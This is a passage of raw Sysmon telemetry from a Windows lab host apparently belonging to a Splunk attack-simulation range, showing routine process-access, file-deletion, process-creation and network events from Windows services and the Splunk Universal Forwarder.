14:57:17.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1BC15A43C2C1A5CA90EAD44F1A9591C,SHA256=6F1FC80F5B2E61EF97CD9F10C2F7343465EDA629912773ADD489E302C6E9E849,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-724D-613B-22B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-724D-613B-22B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.365{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-724D-613B-22B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.351{B81B27B7-724D-613B-22B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035341950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:44.227{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52364-false10.0.1.12-8000- 23542300x800000000000000035341949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:18.943{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F76E893E9CED567B07E9BBB4941A12DF,SHA256=6CF22E33BB17AE0887C0DFCDC75BEE7DA7AB9ABCDA738071F4B33FE2C3568165,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:18.460{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C994720443ABDBE09034C25A4299CA33,SHA256=728943A52192FFF632A314490ECFDCD28F3F6023585FB2DA15BADEDFB3A9DA01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:18.460{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBC194C0192761D98AC066FE4155F230,SHA256=1B07BE642AF0747ECF3A489083D4E6BA279D8C2D72F61E1077EE2DF6BA5F5E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:18.185{B81B27B7-724D-613B-23B4-03000000C801}47685272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.339{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 